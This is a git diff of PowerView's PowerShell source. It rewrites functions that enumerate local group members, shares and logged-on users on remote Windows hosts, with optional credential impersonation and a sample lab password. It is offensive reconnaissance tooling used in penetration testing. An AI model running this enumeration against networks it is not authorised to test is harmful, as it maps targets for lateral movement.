PSObject + $LocalGroup | Add-Member Noteproperty 'ComputerName' $Computer + $LocalGroup | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name + $LocalGroup | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment + $LocalGroup.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API') + $LocalGroup } - $Policy + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetLocalGroup] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + else { + # otherwise we're using the WinNT service provider + $ComputerProvider = [ADSI]"WinNT://$Computer,computer" + + $ComputerProvider.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object { + $LocalGroup = ([ADSI]$_) + $Group = New-Object PSObject + $Group | Add-Member Noteproperty 'ComputerName' $Computer + $Group | Add-Member Noteproperty 'GroupName' ($LocalGroup.InvokeGet('Name')) + $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalGroup.InvokeGet('objectsid'),0)).Value) + $Group | Add-Member Noteproperty 'Comment' ($LocalGroup.InvokeGet('Description')) + $Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT') + $Group } - else { $_ } } } } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } } - -######################################################## -# -# Functions that enumerate a single host, either through -# WinNT, WMI, remote registry, or API calls -# (with PSReflect). -# -######################################################## - -function Get-NetLocalGroup { +function Get-NetLocalGroupMember { <# - .SYNOPSIS +.SYNOPSIS - Gets a list of all current users in a specified local group, - or returns the names of all local groups with -ListGroups. +Enumerates members of a specific local group on the local (or remote) machine. - .PARAMETER ComputerName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Convert-ADName - The hostname or IP to query for local group users. +.DESCRIPTION - .PARAMETER ComputerFile +This function will enumerate the members of a specified local group on the +current, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers +will be used (for speed). Specifying "-Method WinNT" causes the WinNT service provider +to be used instead, which returns a larger amount of information. - File of hostnames/IPs to query for local group users. +.PARAMETER ComputerName - .PARAMETER GroupName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. - The local group name to query for users. If not given, it defaults to "Administrators" +.PARAMETER GroupName - .PARAMETER ListGroups +The local group name to query for users. If not given, it defaults to "Administrators". - Switch. List all the local groups instead of their members. - Old Get-NetLocalGroups functionality. +.PARAMETER Method - .PARAMETER Recurse +The collection method to use, defaults to 'API', also accepts 'WinNT'. - Switch. If the local member member is a domain group, recursively try to resolve its members to get a list of domain users who can access this machine. +.PARAMETER Credential - .PARAMETER API +A [Management.Automation.PSCredential] object of alternate credentials +for connection to a remote machine. Only applicable with "-Method WinNT". - Switch. Use API calls instead of the WinNT service provider. Less information, - but the results are faster. +.EXAMPLE - .EXAMPLE +Get-NetLocalGroupMember | ft - PS C:\> Get-NetLocalGroup +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True - Returns the usernames that of members of localgroup "Administrators" on the local host. +.EXAMPLE - .EXAMPLE +Get-NetLocalGroupMember -Method winnt | ft - PS C:\> Get-NetLocalGroup -ComputerName WINDOWSXP +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True - Returns all the local administrator accounts for WINDOWSXP +.EXAMPLE - .EXAMPLE +Get-NetLocalGroup | Get-NetLocalGroupMember | ft - PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -Recurse +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True +WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... False False +WINDOWS1 IIS_IUSRS NT AUTHORIT... S-1-5-17 False False +WINDOWS1 Users NT AUTHORIT... S-1-5-4 False False +WINDOWS1 Users NT AUTHORIT... S-1-5-11 False False +WINDOWS1 Users WINDOWS1\lo... S-1-5-21-25... False UNKNOWN +WINDOWS1 Users TESTLAB\Dom... S-1-5-21-89... True UNKNOWN - Returns all effective local/domain users/groups that can access WINDOWS7 with - local administrative privileges. +.EXAMPLE - .EXAMPLE +Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft - PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -ListGroups +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +primary.tes... Administrators TESTLAB\Adm... S-1-5-21-89... False False +primary.tes... Administrators TESTLAB\loc... S-1-5-21-89... False False +primary.tes... Administrators TESTLAB\Ent... S-1-5-21-89... True False +primary.tes... Administrators TESTLAB\Dom... S-1-5-21-89... True False - Returns all local groups on the WINDOWS7 host. +.OUTPUTS - .EXAMPLE +PowerView.LocalGroupMember.API - PS C:\> "WINDOWS7", "WINDOWSSP" | Get-NetLocalGroup -API +Custom PSObject with translated group property fields from API results. - Returns all local groups on the the passed hosts using API calls instead of the - WinNT service provider. +PowerView.LocalGroupMember.WinNT - .LINK +Custom PSObject with translated group property fields from WinNT results. - http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together - http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +.LINK + +http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx #> - [CmdletBinding(DefaultParameterSetName = 'WinNT')] - param( - [Parameter(ParameterSetName = 'API', Position=0, ValueFromPipeline=$True)] - [Parameter(ParameterSetName = 'WinNT', Position=0, ValueFromPipeline=$True)] - [Alias('HostName')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroupMember.API')] + [OutputType('PowerView.LocalGroupMember.WinNT')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] [String[]] - $ComputerName = $Env:ComputerName, - - [Parameter(ParameterSetName = 'WinNT')] - [Parameter(ParameterSetName = 'API')] - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] - [String] - $ComputerFile, + $ComputerName = $Env:COMPUTERNAME, - [Parameter(ParameterSetName = 'WinNT')] - [Parameter(ParameterSetName = 'API')] + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] [String] $GroupName = 'Administrators', - [Parameter(ParameterSetName = 'WinNT')] - [Switch] - $ListGroups, - - [Parameter(ParameterSetName = 'WinNT')] - [Switch] - $Recurse, + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', - [Parameter(ParameterSetName = 'API')] - [Switch] - $API + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - process { - - $Servers = @() - - # if we have a host list passed, grab it - if($ComputerFile) { - $Servers = Get-Content -Path $ComputerFile - } - else { - # otherwise assume a single host name - $Servers += $ComputerName | Get-NameField + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential } + } - # query the specified group using the WINNT provider, and - # extract fields as appropriate from the results - ForEach($Server in $Servers) { - - if($API) { + PROCESS { + ForEach ($Computer in $ComputerName) { + if ($Method -eq 'API') { # if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information + # arguments for NetLocalGroupGetMembers $QueryLevel = 2 $PtrInfo = [IntPtr]::Zero @@ -7748,12 +14495,12 @@ function Get-NetLocalGroup { $ResumeHandle = 0 # get the local user information - $Result = $Netapi32::NetLocalGroupGetMembers($Server, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + $Result = $Netapi32::NetLocalGroupGetMembers($Computer, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) - # Locate the offset of the initial intPtr + # locate the offset of the initial intPtr $Offset = $PtrInfo.ToInt64() - $LocalUsers = @() + $Members = @() # 0 = success if (($Result -eq 0) -and ($Offset -gt 0)) { @@ -7770,23 +14517,22 @@ function Get-NetLocalGroup { $Offset = $NewIntPtr.ToInt64() $Offset += $Increment - $SidString = "" + $SidString = '' $Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - if($Result2 -eq 0) { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + if ($Result2 -eq 0) { + Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" } else { - $LocalUser = New-Object PSObject - $LocalUser | Add-Member Noteproperty 'ComputerName' $Server - $LocalUser | Add-Member Noteproperty 'AccountName' $Info.lgrmi2_domainandname - $LocalUser | Add-Member Noteproperty 'SID' $SidString - + $Member = New-Object PSObject + $Member | Add-Member Noteproperty 'ComputerName' $Computer + $Member | Add-Member Noteproperty 'GroupName' $GroupName + $Member | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname + $Member | Add-Member Noteproperty 'SID' $SidString $IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup') - $LocalUser | Add-Member Noteproperty 'IsGroup' $IsGroup - $LocalUser.PSObject.TypeNames.Add('PowerView.LocalUserAPI') - - $LocalUsers += $LocalUser + $Member | Add-Member Noteproperty 'IsGroup' $IsGroup + $Member.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API') + $Members += $Member } } @@ -7794,4716 +14540,4890 @@ function Get-NetLocalGroup { $Null = $Netapi32::NetApiBufferFree($PtrInfo) # try to extract out the machine SID by using the -500 account as a reference - $MachineSid = $LocalUsers | Where-Object {$_.SID -like '*-500'} - $Parts = $MachineSid.SID.Split('-') - $MachineSid = $Parts[0..($Parts.Length -2)] -join '-' + $MachineSid = $Members | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID + if ($MachineSid) { + $MachineSid = $MachineSid.Substring(0, $MachineSid.LastIndexOf('-')) - $LocalUsers | ForEach-Object { - if($_.SID -match $MachineSid) { - $_ | Add-Member Noteproperty 'IsDomain' $False + $Members | ForEach-Object { + if ($_.SID -match $MachineSid) { + $_ | Add-Member Noteproperty 'IsDomain' $False + } + else { + $_ | Add-Member Noteproperty 'IsDomain' $True + } } - else { - $_ | Add-Member Noteproperty 'IsDomain' $True + } + else { + $Members | ForEach-Object { + if ($_.SID -notmatch 'S-1-5-21') { + $_ | Add-Member Noteproperty 'IsDomain' $False + } + else { + $_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN' + } } } - $LocalUsers + $Members } else { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" + Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $Result).Message)" } } - else { # otherwise we're using the WinNT service provider try { - if($ListGroups) { - # if we're listing the group names on a remote server - $Computer = [ADSI]"WinNT://$Server,computer" - - $Computer.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object { - $Group = New-Object PSObject - $Group | Add-Member Noteproperty 'Server' $Server - $Group | Add-Member Noteproperty 'Group' ($_.name[0]) - $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier $_.objectsid[0],0).Value) - $Group | Add-Member Noteproperty 'Description' ($_.Description[0]) - $Group.PSObject.TypeNames.Add('PowerView.LocalGroup') - $Group - } - } - else { - # otherwise we're listing the group members - $Members = @($([ADSI]"WinNT://$Server/$GroupName,group").psbase.Invoke('Members')) - - $Members | ForEach-Object { - - $Member = New-Object PSObject - $Member | Add-Member Noteproperty 'ComputerName' $Server + $GroupProvider = [ADSI]"WinNT://$Computer/$GroupName,group" - $AdsPath = ($_.GetType().InvokeMember('Adspath', 'GetProperty', $Null, $_, $Null)).Replace('WinNT://', '') - $Class = $_.GetType().InvokeMember('Class', 'GetProperty', $Null, $_, $Null) + $GroupProvider.psbase.Invoke('Members') | ForEach-Object { - # try to translate the NT4 domain to a FQDN if possible - $Name = Convert-ADName -ObjectName $AdsPath -InputType 'NT4' -OutputType 'Canonical' - $IsGroup = $Class -eq "Group" + $Member = New-Object PSObject + $Member | Add-Member Noteproperty 'ComputerName' $Computer + $Member | Add-Member Noteproperty 'GroupName' $GroupName - if($Name) { - $FQDN = $Name.split("/")[0] - $ObjName = $AdsPath.split("/")[-1] - $Name = "$FQDN/$ObjName" - $IsDomain = $True - } - else { - $ObjName = $AdsPath.split("/")[-1] - $Name = $AdsPath - $IsDomain = $False - } - - $Member | Add-Member Noteproperty 'AccountName' $Name - $Member | Add-Member Noteproperty 'IsDomain' $IsDomain - $Member | Add-Member Noteproperty 'IsGroup' $IsGroup - - if($IsDomain) { - # translate the binary sid to a string - $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($_.GetType().InvokeMember('ObjectSID', 'GetProperty', $Null, $_, $Null),0)).Value) - $Member | Add-Member Noteproperty 'Description' "" - $Member | Add-Member Noteproperty 'Disabled' "" + $LocalUser = ([ADSI]$_) + $AdsPath = $LocalUser.InvokeGet('AdsPath').Replace('WinNT://', '') + $IsGroup = ($LocalUser.SchemaClassName -like 'group') - if($IsGroup) { - $Member | Add-Member Noteproperty 'LastLogin' "" - } - else { - try { - $Member | Add-Member Noteproperty 'LastLogin' ( $_.GetType().InvokeMember('LastLogin', 'GetProperty', $Null, $_, $Null)) - } - catch { - $Member | Add-Member Noteproperty 'LastLogin' "" - } - } - $Member | Add-Member Noteproperty 'PwdLastSet' "" - $Member | Add-Member Noteproperty 'PwdExpired' "" - $Member | Add-Member Noteproperty 'UserFlags' "" - } - else { - # repull this user object so we can ensure correct information - $LocalUser = $([ADSI] "WinNT://$AdsPath") - - # translate the binary sid to a string - $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.objectSid.value,0)).Value) - $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description[0]) - - if($IsGroup) { - $Member | Add-Member Noteproperty 'PwdLastSet' "" - $Member | Add-Member Noteproperty 'PwdExpired' "" - $Member | Add-Member Noteproperty 'UserFlags' "" - $Member | Add-Member Noteproperty 'Disabled' "" - $Member | Add-Member Noteproperty 'LastLogin' "" - } - else { - $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0])) - $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1') - $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] ) - # UAC flags of 0x2 mean the account is disabled - $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.userFlags.value -band 2) -eq 2) - try { - $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0]) - } - catch { - $Member | Add-Member Noteproperty 'LastLogin' "" - } - } - } - $Member.PSObject.TypeNames.Add('PowerView.LocalUser') - $Member - - # if the result is a group domain object and we're recursing, - # try to resolve all the group member results - if($Recurse -and $IsGroup) { - if($IsDomain) { - $FQDN = $Name.split("/")[0] - $GroupName = $Name.split("/")[1].trim() - - Get-NetGroupMember -GroupName $GroupName -Domain $FQDN -FullData -Recurse | ForEach-Object { - - $Member = New-Object PSObject - $Member | Add-Member Noteproperty 'ComputerName' "$FQDN/$($_.GroupName)" - - $MemberDN = $_.distinguishedName - # extract the FQDN from the Distinguished Name - $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' - - $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype - - if ($_.samAccountName) { - # forest users have the samAccountName set - $MemberName = $_.samAccountName - } - else { - try { - # external trust users have a SID, so convert it - try { - $MemberName = Convert-SidToName $_.cn - } - catch { - # if there's a problem contacting the domain to resolve the SID - $MemberName = $_.cn - } - } - catch { - Write-Debug "Error resolving SID : $_" - } - } - - $Member | Add-Member Noteproperty 'AccountName' "$MemberDomain/$MemberName" - $Member | Add-Member Noteproperty 'SID' $_.objectsid - $Member | Add-Member Noteproperty 'Description' $_.description - $Member | Add-Member Noteproperty 'Disabled' $False - $Member | Add-Member Noteproperty 'IsGroup' $MemberIsGroup - $Member | Add-Member Noteproperty 'IsDomain' $True - $Member | Add-Member Noteproperty 'LastLogin' '' - $Member | Add-Member Noteproperty 'PwdLastSet' $_.pwdLastSet - $Member | Add-Member Noteproperty 'PwdExpired' '' - $Member | Add-Member Noteproperty 'UserFlags' $_.userAccountControl - $Member.PSObject.TypeNames.Add('PowerView.LocalUser') - $Member - } - } else { - Get-NetLocalGroup -ComputerName $Server -GroupName $ObjName -Recurse - } - } + if(([regex]::Matches($AdsPath, '/')).count -eq 1) { + # DOMAIN\user + $MemberIsDomain = $True + $Name = $AdsPath.Replace('/', '\') + } + else { + # DOMAIN\machine\user + $MemberIsDomain = $False + $Name = $AdsPath.Substring($AdsPath.IndexOf('/')+1).Replace('/', '\') } + + $Member | Add-Member Noteproperty 'AccountName' $Name + $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + $Member | Add-Member Noteproperty 'IsGroup' $IsGroup + $Member | Add-Member Noteproperty 'IsDomain' $MemberIsDomain + + # if ($MemberIsDomain) { + # # translate the binary sid to a string + # $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + # $Member | Add-Member Noteproperty 'Description' '' + # $Member | Add-Member Noteproperty 'Disabled' '' + + # if ($IsGroup) { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # else { + # try { + # $Member | Add-Member Noteproperty 'LastLogin' $LocalUser.InvokeGet('LastLogin') + # } + # catch { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # } + # $Member | Add-Member Noteproperty 'PwdLastSet' '' + # $Member | Add-Member Noteproperty 'PwdExpired' '' + # $Member | Add-Member Noteproperty 'UserFlags' '' + # } + # else { + # # translate the binary sid to a string + # $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + # $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description) + + # if ($IsGroup) { + # $Member | Add-Member Noteproperty 'PwdLastSet' '' + # $Member | Add-Member Noteproperty 'PwdExpired' '' + # $Member | Add-Member Noteproperty 'UserFlags' '' + # $Member | Add-Member Noteproperty 'Disabled' '' + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # else { + # $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0])) + # $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1') + # $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] ) + # # UAC flags of 0x2 mean the account is disabled + # $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.UserFlags.value -band 2) -eq 2) + # try { + # $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0]) + # } + # catch { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # } + # } + + $Member } } catch { - Write-Warning "[!] Error: $_" + Write-Verbose "[Get-NetLocalGroupMember] Error for $Computer : $_" } } } } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } } -filter Get-NetShare { -<# - .SYNOPSIS - - This function will execute the NetShareEnum Win32API call to query - a given host for open shares. This is a replacement for - "net share \\hostname" - - .PARAMETER ComputerName - - The hostname to query for shares. Also accepts IP addresses. - - .OUTPUTS - - SHARE_INFO_1 structure. A representation of the SHARE_INFO_1 - result structure which includes the name and note for each share, - with the ComputerName added. - - .EXAMPLE - - PS C:\> Get-NetShare - - Returns active shares on the local host. - - .EXAMPLE - - PS C:\> Get-NetShare -ComputerName sqlserver - - Returns active shares on the 'sqlserver' host - - .EXAMPLE - - PS C:\> Get-NetComputer | Get-NetShare - - Returns all shares for all computers in the domain. - - .LINK - - http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ -#> - - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] - [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost' - ) - - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField - # arguments for NetShareEnum - $QueryLevel = 1 - $PtrInfo = [IntPtr]::Zero - $EntriesRead = 0 - $TotalRead = 0 - $ResumeHandle = 0 - - # get the share information - $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) +function Get-NetShare { +<# +.SYNOPSIS - # Locate the offset of the initial intPtr - $Offset = $PtrInfo.ToInt64() +Returns open shares on the local (or a remote) machine. - # 0 = success - if (($Result -eq 0) -and ($Offset -gt 0)) { +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf - # Work out how much to increment the pointer by finding out the size of the structure - $Increment = $SHARE_INFO_1::GetSize() +.DESCRIPTION - # parse all the result structures - for ($i = 0; ($i -lt $EntriesRead); $i++) { - # create a new int ptr at the given offset and cast the pointer as our result structure - $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset - $Info = $NewIntPtr -as $SHARE_INFO_1 +This function will execute the NetShareEnum Win32API call to query +a given host for open shares. This is a replacement for "net share \\hostname". - # return all the sections of the structure - $Shares = $Info | Select-Object * - $Shares | Add-Member Noteproperty 'ComputerName' $Computer - $Offset = $NewIntPtr.ToInt64() - $Offset += $Increment - $Shares - } +.PARAMETER ComputerName - # free up the result buffer - $Null = $Netapi32::NetApiBufferFree($PtrInfo) - } - else { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" - } -} +Specifies the hostname to query for shares (also accepts IP addresses). +Defaults to 'localhost'. +.PARAMETER Credential -filter Get-NetLoggedon { -<# - .SYNOPSIS +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. - This function will execute the NetWkstaUserEnum Win32API call to query - a given host for actively logged on users. +.EXAMPLE - .PARAMETER ComputerName +Get-NetShare - The hostname to query for logged on users. +Returns active shares on the local host. - .OUTPUTS +.EXAMPLE - WKSTA_USER_INFO_1 structure. A representation of the WKSTA_USER_INFO_1 - result structure which includes the username and domain of logged on users, - with the ComputerName added. +Get-NetShare -ComputerName sqlserver - .EXAMPLE +Returns active shares on the 'sqlserver' host - PS C:\> Get-NetLoggedon +.EXAMPLE - Returns users actively logged onto the local host. +Get-DomainComputer | Get-NetShare - .EXAMPLE +Returns all shares for all computers in the domain. - PS C:\> Get-NetLoggedon -ComputerName sqlserver +.EXAMPLE - Returns users actively logged onto the 'sqlserver' host. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetShare -ComputerName sqlserver -Credential $Cred - .EXAMPLE +.OUTPUTS - PS C:\> Get-NetComputer | Get-NetLoggedon +PowerView.ShareInfo - Returns all logged on userse for all computers in the domain. +A PSCustomObject representing a SHARE_INFO_1 structure, including +the name/type/remark for each share, with the ComputerName added. - .LINK +.LINK - http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ #> + [OutputType('PowerView.ShareInfo')] [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost' - ) - - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField - - # Declare the reference variables - $QueryLevel = 1 - $PtrInfo = [IntPtr]::Zero - $EntriesRead = 0 - $TotalRead = 0 - $ResumeHandle = 0 - - # get logged on user information - $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) - - # Locate the offset of the initial intPtr - $Offset = $PtrInfo.ToInt64() + [String[]] + $ComputerName = 'localhost', - # 0 = success - if (($Result -eq 0) -and ($Offset -gt 0)) { + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - # Work out how much to increment the pointer by finding out the size of the structure - $Increment = $WKSTA_USER_INFO_1::GetSize() + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } - # parse all the result structures - for ($i = 0; ($i -lt $EntriesRead); $i++) { - # create a new int ptr at the given offset and cast the pointer as our result structure - $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset - $Info = $NewIntPtr -as $WKSTA_USER_INFO_1 + PROCESS { + ForEach ($Computer in $ComputerName) { + # arguments for NetShareEnum + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get the raw share information + $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $SHARE_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $SHARE_INFO_1 + + # return all the sections of the structure - have to do it this way for V2 + $Share = $Info | Select-Object * + $Share | Add-Member Noteproperty 'ComputerName' $Computer + $Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $Share + } - # return all the sections of the structure - $LoggedOn = $Info | Select-Object * - $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer - $Offset = $NewIntPtr.ToInt64() - $Offset += $Increment - $LoggedOn + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetShare] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } } - - # free up the result buffer - $Null = $Netapi32::NetApiBufferFree($PtrInfo) } - else { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } } } -filter Get-NetSession { +function Get-NetLoggedon { <# - .SYNOPSIS +.SYNOPSIS - This function will execute the NetSessionEnum Win32API call to query - a given host for active sessions on the host. - Heavily adapted from dunedinite's post on stackoverflow (see LINK below) +Returns users logged on the local (or a remote) machine. +Note: administrative rights needed for newer Windows OSes. - .PARAMETER ComputerName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf - The ComputerName to query for active sessions. +.DESCRIPTION - .PARAMETER UserName +This function will execute the NetWkstaUserEnum Win32API call to query +a given host for actively logged on users. - The user name to filter for active sessions. +.PARAMETER ComputerName - .OUTPUTS +Specifies the hostname to query for logged on users (also accepts IP addresses). +Defaults to 'localhost'. - SESSION_INFO_10 structure. A representation of the SESSION_INFO_10 - result structure which includes the host and username associated - with active sessions, with the ComputerName added. +.PARAMETER Credential - .EXAMPLE - - PS C:\> Get-NetSession - - Returns active sessions on the local host. - - .EXAMPLE - - PS C:\> Get-NetSession -ComputerName sqlserver - - Returns active sessions on the 'sqlserver' host. - - .EXAMPLE - - PS C:\> Get-NetDomainController | Get-NetSession - - Returns active sessions on all domain controllers. - - .LINK - - http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ -#> - - [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] - [ValidateNotNullOrEmpty()] - $ComputerName = 'localhost', - - [String] - $UserName = '' - ) - - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField - - # arguments for NetSessionEnum - $QueryLevel = 10 - $PtrInfo = [IntPtr]::Zero 